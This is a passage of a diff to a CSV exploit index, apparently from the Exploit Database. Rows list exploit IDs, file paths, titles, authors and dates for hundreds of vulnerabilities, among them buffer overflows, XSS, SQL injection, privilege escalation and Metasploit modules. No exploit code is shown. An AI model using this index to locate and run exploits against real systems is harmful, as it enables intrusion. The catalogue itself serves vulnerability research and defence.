Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0 33090,platforms/hardware/webapps/33090.txt,"TRENDnet TEW-634GRU 1.00.23 - Multiple Vulnerabilities",2014-04-29,SirGod,hardware,webapps,69 33091,platforms/php/webapps/33091.txt,"NULL NUKE CMS 2.2 - Multiple Vulnerabilities",2014-04-29,LiquidWorm,php,webapps,80 +33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service Vulnerability",2009-11-12,HACKATTACK,windows,dos,0 +33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow Vulnerability",2009-11-12,HACKATTACK,novell,remote,0 +33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 Information Disclosure Vulnerability",2009-11-06,"Daniel King",jsp,webapps,0 +33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0 +33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Include Vulnerability",2009-07-16,MustLive,multiple,remote,0 +33579,platforms/multiple/dos/33579.txt,"Ingres Database 9.3 Heap Buffer Overflow Vulnerability",2010-01-29,"Evgeny Legerov",multiple,dos,0 +33580,platforms/hardware/remote/33580.txt,"Comtrend CT-507 IT ADSL Router 'scvrtsrv.cmd' Cross-Site Scripting Vulnerability",2010-01-29,Yoyahack,hardware,remote,0 33095,platforms/windows/remote/33095.rb,"Adobe Flash Player Type Confusion Remote Code Execution",2014-04-29,metasploit,windows,remote,0 33096,platforms/multiple/dos/33096.txt,"Crysis 1.21/1.5 HTTP/XML-RPC Service Access Violation Remote Denial of Service Vulnerability",2009-06-20,"Luigi Auriemma",multiple,dos,0 33097,platforms/php/webapps/33097.txt,"Programs Rating rate.php id Parameter XSS",2009-06-20,Moudi,php,webapps,0 @@ -29841,15 +29894,16 @@ id,file,description,date,author,platform,type,port 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting Vulnerability",2009-06-28,Moudi,php,webapps,0 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,Moudi,php,webapps,0 33128,platforms/linux/remote/33128.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-06-30,"Dan Kaminsky",linux,remote,0 -33129,platforms/hardware/webapps/33129.html,"Beetel 450TC2 Router Admin Password CSRF Vulnerability",2014-04-30,"shyamkumar somana",hardware,webapps,80 +33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 category.php cat Parameter XSS",2009-07-27,Moudi,php,webapps,0 33130,platforms/php/webapps/33130.txt,"NTSOFT BBS E-Market Professional Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Ivan Sanchez",php,webapps,0 33131,platforms/php/webapps/33131.txt,"XOOPS 2.3.3 \\\'op\\\' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-06-30,"Sense of Security",php,webapps,0 33132,platforms/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection Vulnerability",2009-07-30,MizoZ,php,webapps,0 33133,platforms/multiple/dos/33133.txt,"Adobe Flash Player <= 10.0.22 and AIR URI Parsing Heap Buffer Overflow Vulnerability",2009-07-30,iDefense,multiple,dos,0 33134,platforms/linux/dos/33134.txt,"Adobe Flash Player <= 10.0.22 and AIR - 'intf_count' Integer Overflow Vulnerability",2009-07-30,"Roee Hay",linux,dos,0 33136,platforms/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution Exploit",2014-05-01,0x4148,hardware,webapps,0 +33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 33138,platforms/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Stored XSS Vulnerability",2014-05-01,"Dolev Farhi",hardware,webapps,0 -33141,platforms/php/remote/33141.rb,"AlienVault OSSIM SQL Injection and Remote Code Execution",2014-05-02,metasploit,php,remote,443 +33584,platforms/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0 33142,platforms/multiple/remote/33142.rb,"Apache Struts ClassLoader Manipulation Remote Code Execution",2014-05-02,metasploit,multiple,remote,8080 33143,platforms/hardware/remote/33143.rb,"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation",2014-05-02,"Brandon Perry",hardware,remote,443 33144,platforms/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,php,webapps,0 @@ -29858,6 +29912,7 @@ id,file,description,date,author,platform,type,port 33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Parameter Cross-Site Scripting Vulnerability",2009-08-05,"599eme Man",php,webapps,0 33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x - 'posix-timers.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-06,"Hiroshi Shimamoto",linux,dos,0 33149,platforms/php/webapps/33149.txt,"Alkacon OpenCMS 7.x - Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0 +33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0 33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 - 'cat' Parameter Cross-Site Scripting and SQL Injection Vulnerabilities",2009-08-07,"599eme Man",php,webapps,0 33153,platforms/php/webapps/33153.txt,"SupportPRO SupportDesk 3.0 - 'shownews.php' Cross-Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0 33154,platforms/php/webapps/33154.txt,"SQLiteManager 1.2 - 'main.php' Cross-Site Scripting Vulnerability",2009-08-10,"Hadi Kiamarsi",php,webapps,0 @@ -29885,6 +29940,7 @@ id,file,description,date,author,platform,type,port 33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 HTTP Basic Authentication NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-18,"Brad Antoniewicz",linux,dos,0 33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0 33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross-Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0 +33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting Vulnerability",2009-09-23,IBM,java,webapps,0 33180,platforms/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting Vulnerability",2009-08-19,"Adam Bixby",multiple,webapps,0 33181,platforms/java/webapps/33181.txt,"Computer Associates SiteMinder Unicode Cross-Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",java,webapps,0 33182,platforms/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service Vulnerability",2009-08-23,"Luigi Auriemma",multiple,dos,0 @@ -29900,8 +29956,6 @@ id,file,description,date,author,platform,type,port 33192,platforms/multiple/remote/33192.php,"Google Chrome <= 6.0.472 - 'Math.Random()' Random Number Generation Vulnerability",2009-08-31,"Amit Klein",multiple,remote,0 33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-19,"Eric W. Biederman",linux,dos,0 33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 - Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0 -33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 category.php cat Parameter XSS",2009-07-27,Moudi,php,webapps,0 -33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 login.php goto Parameter XSS",2009-07-27,Moudi,php,webapps,0 33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 - searchresults.php page Parameter XSS",2009-07-27,Moudi,php,webapps,0 33200,platforms/php/webapps/33200.txt,"68 Classifieds 4.1 toplistings.php page Parameter XSS",2009-07-27,Moudi,php,webapps,0 33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 viewlisting.php view Parameter XSS",2009-07-27,Moudi,php,webapps,0 @@ -29946,14 +30000,18 @@ id,file,description,date,author,platform,type,port 33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter SQL Injection",2009-09-22,OoN_Boy,php,webapps,0 33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter XSS",2009-09-22,OoN_Boy,php,webapps,0 33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone SQL Injection Vulnerability",2009-09-23,OoN_Boy,php,webapps,0 +33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0 +33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 register.php result Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 +33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 index.php New User Creation CSRF",2009-11-10,"Andrew Horton",php,webapps,0 +33709,platforms/php/webapps/33709.txt,"Natychmiast CMS - Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2010-03-05,"Maciej Gojny",php,webapps,0 +33710,platforms/windows/dos/33710.txt,"J. River Media Jukebox 12 - (.mp3) Remote Heap Buffer Overflow Vulnerability",2010-03-04,"Gjoko Krstic",windows,dos,0 +33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass Vulnerability",2009-09-25,"Jan Lieskovsky",linux,local,0 33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0 33248,platforms/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple persistent XSS Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps,0 33249,platforms/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps,0 33250,platforms/php/webapps/33250.txt,"Collabtive 1.2 - Stored XSS",2014-05-08,"Deepak Rathore",php,webapps,0 33251,platforms/multiple/dos/33251.txt,"Python - Interpreter Heap Memory Corruption (PoC)",2014-05-08,"Debasish Mandal",multiple,dos,0 33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x - 2.6.x - LFI Vulnerability",2014-05-08,"Dolev Farhi",php,webapps,0 -33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 - 'simpleSearch.do' Cross-Site Scripting Vulnerability",2009-09-23,IBM,java,webapps,0 -33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass Vulnerability",2009-09-25,"Jan Lieskovsky",linux,local,0 33256,platforms/php/webapps/33256.txt,"e107 0.7.x - 'CAPTCHA' Security Bypass Vulnerability and Multiple Cross-Site Scripting Vulnerabilities",2009-09-28,MustLive,php,webapps,0 33257,platforms/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J - Web Interface Default URI PATH_INFO Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 33258,platforms/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface /diagnose Multiple Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 @@ -29962,21 +30020,25 @@ id,file,description,date,author,platform,type,port 33261,platforms/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J-Web Interface Multiple Script m[] Parameter XSS",2009-09-22,"Amir Azam",hardware,remote,0 33262,platforms/php/webapps/33262.txt,"Interspire Knowledge Manager 5 - 'p' Parameter Directory Traversal Vulnerability",2009-09-29,"Infected Web",php,webapps,0 33263,platforms/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",windows,remote,0 -33264,platforms/windows/remote/33264.txt,"Internet Explorer 8 X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 Email Arbitrary Script Injection Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 33266,platforms/php/webapps/33266.txt,"Joomla! CB Resume Builder 'group_id' Parameter SQL Injection Vulnerability",2009-10-05,kaMtiEz,php,webapps,0 33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription 'email' Parameter Cross-Site Scripting Vulnerability",2009-10-06,"Paulo Santos",php,webapps,0 -33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,"Sbastien Duquette",asp,webapps,0 +33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps,0 33269,platforms/linux/dos/33269.txt,"Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service Vulnerability",2009-10-15,"Doug Prostko",linux,dos,0 33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 - 'deflate' HTTP Content Encoding Remote Code Execution Vulnerability",2009-10-13,Skylined,windows,remote,0 33271,platforms/windows/dos/33271.py,"VMware Player and Workstation <= 6.5.3 - 'vmware-authd' Remote Denial of Service Vulnerability",2009-10-07,shinnai,windows,dos,0 33272,platforms/windows/remote/33272.txt,"Autodesk 3ds Max Application Callbacks Arbitrary Command Execution Vulnerability",2009-10-23,"Sebastian Tello",windows,remote,0 +33264,platforms/windows/remote/33264.txt,"Internet Explorer 8 X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene TOC File Remote Code Execution Vulnerability",2009-11-23,"Diego Juarez",windows,remote,0 +33590,platforms/php/webapps/33590.txt,"Joomla! AutartiTarot Component Directory Traversal Vulnerability",2010-02-01,B-HUNT3|2,php,webapps,0 +33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Command Directory Traversal Vulnerability",2010-02-15,fb1h2s,windows,remote,0 +33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 - search.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 - 'LunaSysMgr' Service Denial of Service Vulnerability",2009-10-13,"Townsend Ladd Harris",hardware,dos,0 33281,platforms/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0 33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 - 'index.php' Cross-Site Scripting and SQL Injection Vulnerabilities",2009-10-13,infosecstuff,php,webapps,0 33283,platforms/linux/dos/33283.txt,"Adobe Reader <= 9.1.3 and Acrobat COM Objects Memory Corruption Remote Code Execution Vulnerability",2009-10-13,Skylined,linux,dos,0 33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0 +33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection",2014-05-12,"Chris Hebert",php,webapps,443 33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Parameter Cross-Site Scripting Vulnerability",2009-10-14,"Michele Orru",java,webapps,0 33287,platforms/php/webapps/33287.txt,"bloofoxCMS 0.3.5 - 'search' Parameter Cross-Site Scripting Vulnerability",2009-10-15,"drunken danish rednecks",php,webapps,0 33288,platforms/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Parameter Cross-Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0 @@ -30001,22 +30063,26 @@ id,file,description,date,author,platform,type,port 33307,platforms/php/webapps/33307.php,"RunCMS 'forum' Parameter SQL Injection Vulnerability",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0 33308,platforms/php/webapps/33308.txt,"Sahana 0.6.2 - 'mod' Parameter Local File Disclosure Vulnerability",2009-10-27,"Greg Miernicki",php,webapps,0 33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Parameter Cross-Site Scripting Vulnerability",2009-10-26,blake,php,webapps,0 -33310,platforms/multiple/remote/33310.nse,"VMware Server <= 2.0.1,ESXi Server <= 3.5 - Directory Traversal Vulnerability",2009-10-27,"Justin Morehouse",multiple,remote,0 +33310,platforms/multiple/remote/33310.nse,"VMware Server <= 2.0.1_ESXi Server <= 3.5 - Directory Traversal Vulnerability",2009-10-27,"Justin Morehouse",multiple,remote,0 33311,platforms/linux/remote/33311.txt,"KDE <= 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox <= 3.5.3 Floating Point Conversion Heap Overflow Vulnerability",2009-10-27,"Alin Rad Pop",linux,dos,0 33313,platforms/linux/remote/33313.txt,"Mozilla Firefox <= 3.5.3 and SeaMonkey <= 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow Vulnerability",2009-10-27,regenrecht,linux,remote,0 33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 - Remote Memory Corruption Vulnerability",2009-10-27,"Carsten Book",linux,dos,0 33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0 33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0 -33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection",2014-05-12,"Chris Hebert",php,webapps,443 33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Parameter Cross-Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0 33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation Vulnerability (1)",2009-11-03,"teach & xipe",linux,local,0 33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x - pipe.c Local Privilege Escalation Vulnerability (2)",2009-11-03,"teach & xipe",linux,local,0 +33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability",2010-02-02,"Li Ming",linux,dos,0 +33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0 +33593,platforms/windows/local/33593.c,"Microsoft Windows XP/VISTA/2000/2003 Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0 +33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability",2010-02-09,"Sumit Gwalani",windows,remote,0 33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0 33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0 33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Denial Of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0 +33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 - search.php from_date_day Parameter Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0 33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent XSS Vulnerabilities",2014-05-12,"Dolev Farhi",windows,webapps,80 33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",2014-05-12,metasploit,windows,remote,34205 33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 @@ -30024,21 +30090,6 @@ id,file,description,date,author,platform,type,port 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 - (.ogg) Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0 -33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x - 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0 -33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0 -33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross-Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0 -33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 -33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 - search.php from_date_day Parameter Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0 -33342,platforms/php/webapps/33342.txt,"CuteNews 1.4.6 - search.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 -33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 register.php result Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 -33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 index.php New User Creation CSRF",2009-11-10,"Andrew Horton",php,webapps,0 -33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0 -33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0 -33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 Information Disclosure Vulnerability",2009-11-06,"Daniel King",jsp,webapps,0 -33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0 -33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service Vulnerability",2009-11-12,HACKATTACK,windows,dos,0 -33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow Vulnerability",2009-11-12,HACKATTACK,novell,remote,0 -33352,platforms/windows/remote/33352.py,"Easy File Sharing Web Server 6.8 - Stack Buffer Overflow",2014-05-14,superkojiman,windows,remote,80 33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80 33354,platforms/php/webapps/33354.txt,"PHD Help Desk 1.43 area.php Multiple Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 33355,platforms/php/webapps/33355.txt,"PHD Help Desk 1.43 solic_display.php q_registros Parameter XSS",2009-11-16,"Amol Naik",php,webapps,0 @@ -30086,37 +30137,6 @@ id,file,description,date,author,platform,type,port 33398,platforms/linux/dos/33398.txt,"MySQL <= 6.0.9 GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0 33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0 33400,platforms/php/webapps/33400.txt,"Ez Cart 'sid' Parameter Cross-Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0 -33401,platforms/php/webapps/33401.txt,"Million Pixel Script 3 - 'pa' Parameter Cross-Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0 -33402,platforms/linux/remote/33402.txt,"Ruby on Rails <= 2.3.5 - 'protect_from_forgery' Cross-Site Request Forgery Vulnerability",2009-12-14,p0deje,linux,remote,0 -33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow Vulnerability",2009-12-14,"Ruben Santamarta ",windows,dos,0 -33404,platforms/php/webapps/33404.txt,"phpFaber CMS 1.3.36 - 'module.php' Cross-Site Scripting Vulnerability",2009-12-14,bi0,php,webapps,0 -33405,platforms/multiple/remote/33405.txt,"APC Network Management Card Cross-Site Request Forgery and Cross-Site Scripting Vulnerabilities",2009-12-15,"Jamal Pecou",multiple,remote,0 -33406,platforms/php/webapps/33406.txt,"Horde <= 3.3.5 Administration Interface admin/phpshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33407,platforms/php/webapps/33407.txt,"Horde <= 3.3.5 Administration Interface admin/cmdshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33408,platforms/php/webapps/33408.txt,"Horde <= 3.3.5 Administration Interface admin/sqlshell.php PATH_INFO Parameter XSS",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33409,platforms/php/webapps/33409.txt,"Article Directory 'login.php' SQL Injection Vulnerabilities",2009-12-16,"R3d D3v!L",php,webapps,0 -33410,platforms/php/webapps/33410.txt,"Drupal Sections 5.x-1.2/6.x-1.2 Module HTML Injection Vulnerability",2009-12-16,"Justin C. Klein Keane",php,webapps,0 -33411,platforms/php/webapps/33411.txt,"iSupport 1.8 ticket_function.php Multiple Parameter XSS",2009-12-16,"Stink and Essandre",php,webapps,0 -33412,platforms/php/webapps/33412.txt,"iSupport 1.8 index.php which Parameter XSS",2009-12-16,"Stink and Essandre",php,webapps,0 -33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 - 'core/admin/auth.php' Cross-Site Scripting Vulnerability",2009-12-17,Metropolis,php,webapps,0 -33414,platforms/php/remote/33414.php,"PHP <= 5.2.11 - 'htmlspecialcharacters()' Malformed Multibyte Character Cross-Site Scripting Vulnerability (1)",2009-12-17,hello@iwamot.com,php,remote,0 -33415,platforms/php/remote/33415.php,"PHP <= 5.2.11 - 'htmlspecialcharacters()' Malformed Multibyte Character Cross-Site Scripting Vulnerability (2)",2009-12-17,hello@iwamot.com,php,remote,0 -33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Parameter Local File Include Vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 -33417,platforms/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 -33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component - 'secid' Parameter SQL Injection Vulnerability",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 -33419,platforms/php/webapps/33419.txt,"F3Site 2009 mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 -33420,platforms/php/webapps/33420.txt,"F3Site 2009 mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 -33421,platforms/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injection Vulnerabilities",2009-12-18,R3d-D3V!L,php,webapps,0 -33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting Vulnerability",2009-12-20,Metropolis,php,webapps,0 -33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0 -33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0 -33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80 -33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0 -33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 - Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002 -33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX 